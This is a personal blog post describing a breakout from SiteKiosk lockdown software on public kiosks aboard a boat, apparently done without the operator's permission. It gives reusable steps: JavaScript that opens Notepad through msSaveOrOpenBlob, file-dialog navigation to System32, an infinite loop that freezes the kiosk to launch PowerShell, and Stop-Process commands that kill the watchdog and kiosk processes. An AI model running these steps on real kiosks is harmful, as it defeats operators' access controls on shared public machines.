Bypassing SiteKiosk software
by Riley MacDonald, February 18, 2019

While exploring a boat during a seven trip I came across some internet kiosks that were secured using SiteKiosk. I was not familiar with this software but quickly discovered that the functionality of the machines were severely limited. SiteKiosk is lockdown software used for safeguarding public access Internet-PCs, Displays and Tablets. It’s designed to protect the browser and operating system against manipulations.

SiteKiosk has a few known vulnerabilities including javascript, flash and PDF. I chose to attempt to exploit via javascript.

Executing javascript
Fortunately both the W3C Try it out widget and jsfiddle websites were accessible. Javascript was also not blocked via the browser instance. This allowed me to write, debug and execute javascript code live within the browser without the need to upload anything to the internet. I was able to visually identify that the machine was running Windows and what appeared to be an instance of Internet Explorer.

Exploiting SiteKiosk using javascript
Using the W3C Try it out widget I ran the following javascript code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<!DOCTYPE html>
<html>
 
<script>
blobBuilder = new MSBlobBuilder();
blobBuilder.append("appended data");
window.navigator.msSaveOrOpenBlob(blobBuilder.getBlob(), "textFile.txt");
</script>
 
<body>
The content of the body element is displayed in your browser.
</body>
 
</html>

This code creates a MSBlobBuilder object and appends the String appendedData to the object. window.navigator.msSaveOrOpenBlob() asks the OS to open or save the blob using the systems default text editor (since we know this is Windows it’s safe to assume this will be notepad).

Navigating Files
Once notepad was opened I was able to use File -> Save as to pop explorer. I was able to navigate to System32 by entering shell:system into the address bar. I was also able to save the file into System32.

Launching Powershell
Back in notepad I used save as again. In an attempt to open a Powershell instance I dragged textFile.txt onto Powershell. Unfortunately SiteKiosk was still running and immediately blocked the action from executing.

Locking SiteKiosk
SiteKiosk needs to be bypassed in order to launch Powershell. This can be accomplished by executing an infinite javascript loop which will lock up the SiteKiosk process for ~30 seconds until it restarts. I headed back over to the W3C widget and appended an infinite loop to the javascript code:

1

for (;;) {}

Before running the code be sure the Save as dialog on notepad is opened and that you’re able to grab the notepad application with your mouse as shortcuts such as ctrl+tab are blocked. After running the code quickly drag textFile.txt onto Powershell. Once SiteKiosk restarts you should have an instance of Powershell opened.

Killing SiteKiosk
Using the Powershell instance SiteKiosk and watchdog (the process which restarts SiteKiosk) can be killed. Using Powershell find the process ids using Get-Process:

PS> Get-Process
 
Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
      0       0        0         16     0              12 sitekiosk
      0       0        0         16     0              13 watchdog

Kill both processes starting with watchdog using Stop-Process using the ids from above:

PS> Stop-Process 13 | Stop-Process 12

SiteKiosk should now be stopped leaving you with a Powershell instance.

Back to blog
Open the comment form

Leave a comment:

Comments will be reviewed before they are posted.

User Comments:

Be the first to leave a comment on this post!